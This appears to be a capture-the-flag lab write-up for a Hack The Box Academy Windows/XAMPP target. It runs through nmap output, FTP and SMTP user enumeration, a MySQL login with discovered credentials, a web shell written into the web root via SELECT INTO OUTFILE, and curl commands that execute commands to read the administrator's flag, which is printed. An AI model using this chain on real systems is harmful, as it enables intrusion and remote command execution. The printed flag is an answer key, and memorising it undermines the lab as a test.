First we need to determine which service that are running on that target
sasoridevops@DG1-NguyenNA3:/mnt/d/nnatts_devops/Private/HTB/HTB_Academy$ sudo nmap -sV -sC 10.129.203.7 [sudo] password for sasoridevops: Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-16 14:39 +07 Nmap scan report for 10.129.203.7 Host is up (0.23s latency). Not shown: 993 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp |ssl-date: 2025-06-16T07:41:29+00:00; +2s from scanner time. | fingerprint-strings: | GenericLines: | 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered | Command unknown, not supported or not allowed... | Command unknown, not supported or not allowed... | Help: | 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered | 214-The following commands are implemented | USER PASS ACCT QUIT PORT RETR | STOR DELE RNFR PWD CWD CDUP | NOOP TYPE MODE STRU | LIST NLST HELP FEAT UTF8 PASV | MDTM REST PBSZ PROT OPTS CCC | XCRC SIZE MFMT CLNT ABORT | HELP command successful | NULL: | 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered | ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US | Not valid before: 2022-04-21T19:27:17 |Not valid after: 2032-04-18T19:27:17 25/tcp open smtp hMailServer smtpd | smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP | 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29) | http-title: Welcome to XAMPP |_Requested resource was http://10.129.203.7/dashboard/ |_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 443/tcp open https Core FTP HTTPS Server |_http-title: Site doesn't have a title (text/html). |_ssl-date: 2025-06-16T07:41:27+00:00; +2s from scanner time. | ssl-cert: Subject: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US | Not valid before: 2022-04-21T19:27:17 |Not valid after: 2032-04-18T19:27:17 |http-server-header: Core FTP HTTPS Server 587/tcp open smtp hMailServer smtpd | smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP | 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB | mysql-info: | Protocol: 10 | Version: 5.5.5-10.4.24-MariaDB | Thread ID: 10 | Capabilities flags: 63486 | Some Capabilities: InteractiveClient, Speaks41ProtocolOld, Support41Auth, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, FoundRows, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolNew, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults | Status: Autocommit | Salt: 'jb,TC3rh3bvKR;m8j/J | Auth Plugin Name: mysql_native_password 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=WIN-EASY | Not valid before: 2025-06-15T07:38:09 |_Not valid after: 2025-12-15T07:38:09 |_ssl-date: 2025-06-16T07:41:27+00:00; +2s from scanner time. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port21-TCP:V=7.94SVN%I=7%D=6/16%Time=684FCA37%P=x86_64-pc-linux-gnu%r(N SF:ULL,41,"220\x20Core\x20FTP\x20Server\x20Version\x202\.0,\x20build\x2072 SF:5,\x2064-bit\x20Unregistered\r\n")%r(GenericLines,AD,"220\x20Core\x20FT SF:P\x20Server\x20Version\x202\.0,\x20build\x20725,\x2064-bit\x20Unregiste SF:red\r\n502\x20Command\x20unknown,\x20not\x20supported\x20or\x20not\x20a SF:llowed\.\.\.\r\n502\x20Command\x20unknown,\x20not\x20supported\x20or\x2 SF:0not\x20allowed\.\.\.\r\n")%r(Help,17B,"220\x20Core\x20FTP\x20Server\x2 SF:0Version\x202\.0,\x20build\x20725,\x2064-bit\x20Unregistered\r\n214-The SF:\x20following\x20commands\x20are\x20implemented\r\n\x20\x20\x20\x20\x20 SF:USER\x20\x20PASS\x20\x20ACCT\x20\x20QUIT\x20\x20PORT\x20\x20RETR\r\n\x2 SF:0\x20\x20\x20\x20STOR\x20\x20DELE\x20\x20RNFR\x20\x20PWD\x20\x20\x20CWD SF:\x20\x20\x20CDUP\r\n\x20\x20\x20\x20\x20MKD\x20\x20\x20RMD\x20\x20\x20N SF:OOP\x20\x20TYPE\x20\x20MODE\x20\x20STRU\r\n\x20\x20\x20\x20\x20LIST\x20 SF:\x20NLST\x20\x20HELP\x20\x20FEAT\x20\x20UTF8\x20\x20PASV\r\n\x20\x20\x2 SF:0\x20\x20MDTM\x20\x20REST\x20\x20PBSZ\x20\x20PROT\x20\x20OPTS\x20\x20CC SF:C\r\n\x20\x20\x20\x20\x20XCRC\x20\x20SIZE\x20\x20MFMT\x20\x20CLNT\x20\x SF:20ABORT\r\n214\x20\x20HELP\x20command\x20successful\r\n"); Service Info: Host: WIN-EASY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 1s, deviation: 0s, median: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 138.91 seconds
After that, we try to pentest for each service
FTP Enumeration¶
sasoridevops@DG1-NguyenNA3:/mnt/d/nnatts_devops/Private/HTB/HTB_Academy$ ftp 10.129.203.7 Connected to 10.129.203.7. 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered Name (10.129.203.7:sasoridevops): 331 password required for sasoridevops Password: 500 PASS: command not understood ftp: Login failed ftp> ftp> exit 221- 221 Goodbye
SMTP Enumeration¶
another command : ./smtp-user-enum.pl -M RCPT -U ../users/users.list -t 10.129.203.7 -D inlanefreight.htb
make sure to find credential fiona:987654321
and keep continue login to mysql mysql -h 10.129.203.7 -u fiona -p987654321 --ssl-mode=DISABLED
because of after login from ftp
we can get some info about target
keep continuing to write a web shell
SELECT "" INTO OUTFILE 'C:\\xampp\\htdocs\\test2.php';
after we write and we get webshell execute
curl -k -u fiona:987654321 "http://inlanefreight.htb/test2.php?c=dir C:\\Users\\Administrator\\Desktop"
curl -k -u fiona:987654321 "http://inlanefreight.htb/test2.php?c=type C:\\Users\\Administrator\\Desktop\\flag.txt"
flag: HTB{t#3r3_4r3_tw0_w4y$_t0_93t_t#3_fl49}